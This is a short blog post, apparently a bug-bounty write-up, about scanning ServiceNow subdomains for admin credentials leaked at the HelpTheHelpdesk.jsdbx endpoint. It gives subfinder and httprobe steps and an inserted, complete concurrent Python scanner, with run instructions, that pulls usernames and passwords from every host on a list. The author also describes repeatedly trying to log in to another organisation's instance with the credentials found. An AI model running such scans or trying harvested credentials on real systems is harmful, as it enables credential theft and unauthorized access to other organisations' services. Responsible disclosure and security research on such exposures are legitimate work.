ServiceNow admin credentials exposed.

efran
2 min read · Mar 15, 2021


After reading the blog post on PortSwigger about ServiceNow admin credentials being exposed, I started to wonder whether all of the credentials had been gathered. I got to work without a moment's delay, but I realized that I didn't know how to find subdomains. All I knew was that there could be login credentials at *.service-now.com/HelpTheHelpdesk.jsdbx. I visualized all the steps in my mind.

I had to find the subdomains (*.service-now.com), then send a GET request to the /HelpTheHelpdesk.jsdbx endpoint on each one and check the response automatically. The most challenging part of this process was automating the GET request and checking the response.

After some quick research, I found subfinder and cloned it. I ran the command below.

subfinder -d service-now.com -o subdomains.txt

But there was a problem that I didn't know about: not all of the subdomains were live, and it was impossible to determine manually which ones were.

`httprobe` saved the situation. I gave subdomains.txt to httprobe, and it created a new file called livesubdomains.txt with only the live subdomains.

How would I send a GET request to the endpoint and check the response? I didn't know. I Googled it and wrote my own script with the help of the Python requests library.

I know that the code is neither the fastest nor the most efficient, but at least it works as intended. I would appreciate any feedback or suggestions you may have.
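The author's script is not reproduced on this page, so the following is an added example, not the author's code, showing the last step of the procedure described above: take the hosts from httprobe's livesubdomains.txt, GET /HelpTheHelpdesk.jsdbx on each, and sort the responses into "keyword absent", "keyword present but empty credentials" and "non-empty credentials", which is the distinction the post draws. It uses only the standard library (urllib instead of requests) and a thread pool so the check is not serial. The exact format of the .jsdbx file is an assumption: the regex only looks for `httpUsername = "..."` and `httpPassword = "..."` pairs with straight double quotes, as the fragments quoted in the post suggest, and the sample bodies are constructed, not captured responses.

```python
import re
import sys
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor

# Endpoint named in the post. The key = "value" layout the regex expects is an
# assumption based on the httpUsername = "" / httpPassword = "" fragments quoted there.
ENDPOINT = "/HelpTheHelpdesk.jsdbx"
CRED_RE = re.compile(r'\b(httpUsername|httpPassword)\s*=\s*"([^"]*)"')


def extract_credentials(body):
    """Return {"httpUsername": ..., "httpPassword": ...} for whichever keys appear in body.

    Absent keys are left out, so a caller can tell "marker missing" (probably a
    login page or error page) apart from "marker present but value is empty".
    """
    return {key: value for key, value in CRED_RE.findall(body)}


def classify(body):
    """Sort one response body into the three outcomes the post describes:
    'no-marker'  - no httpPassword keyword in the response
    'empty'      - keyword present, but username and password are both ""
    'populated'  - at least one value is non-empty; this is the case worth reporting
    """
    creds = extract_credentials(body)
    if "httpPassword" not in creds:
        return "no-marker"
    if any(creds.get(k) for k in ("httpUsername", "httpPassword")):
        return "populated"
    return "empty"


def fetch(url, timeout=10):
    """GET url and return the decoded body, or None on a malformed URL or any network/HTTP error."""
    try:
        req = urllib.request.Request(url, headers={"User-Agent": "jsdbx-check"})
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            # Cap the read so an unexpectedly large response cannot exhaust memory.
            return resp.read(256 * 1024).decode("utf-8", errors="replace")
    except (urllib.error.URLError, OSError, ValueError):
        return None


def check_host(base):
    """base is one httprobe output line, e.g. https://dev12345.service-now.com (hypothetical)."""
    body = fetch(base.rstrip("/") + ENDPOINT)
    if body is None:
        return base, "unreachable", {}
    return base, classify(body), extract_credentials(body)


def scan(bases, workers=20):
    """Check every base URL concurrently; returns a list of (base, verdict, creds)."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return list(pool.map(check_host, bases))


# Constructed sample bodies (not real responses) covering the three verdicts.
SAMPLE_EMPTY = 'var httpUsername = "";\nvar httpPassword = "";\n'
SAMPLE_POPULATED = 'var httpUsername = "helpdesk.admin";\nvar httpPassword = "S3cret!";\n'
SAMPLE_LOGIN_PAGE = '<html><title>ServiceNow</title><form id="login"></form></html>'

if __name__ == "__main__":
    # Usage: python jsdbx_check.py livesubdomains.txt
    with open(sys.argv[1]) as f:
        bases = [line.strip() for line in f if line.strip()]
    for base, verdict, creds in scan(bases):
        if verdict == "populated":
            # Report the host only; a recovered password should go in the report, not a log.
            print(f"[!] {base}: non-empty httpUsername/httpPassword")
        else:
            print(f"[-] {base}: {verdict}")
```

Run it with the file httprobe produced as the only argument; the `populated` verdict is the one that needs a report, `empty` confirms the credentials were already removed on that instance, and `no-marker` or `unreachable` means the endpoint is not serving the file at all.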

I received multiple responses that included the httpPassword = keyword, but all except one had empty credentials: httpPassword = "" and httpUsername = "". All of these credentials had been deleted except one.

No matter how many times I tried to log in with those credentials, unfortunately I couldn't log in successfully. Nevertheless, I prepared a proper report and sent it.

I was not the person who discovered that vulnerability, but I wish I were. I learned a lot from the experience, and I always strive to learn and share what I know. If you have any feedback, feel free to reach out to me.
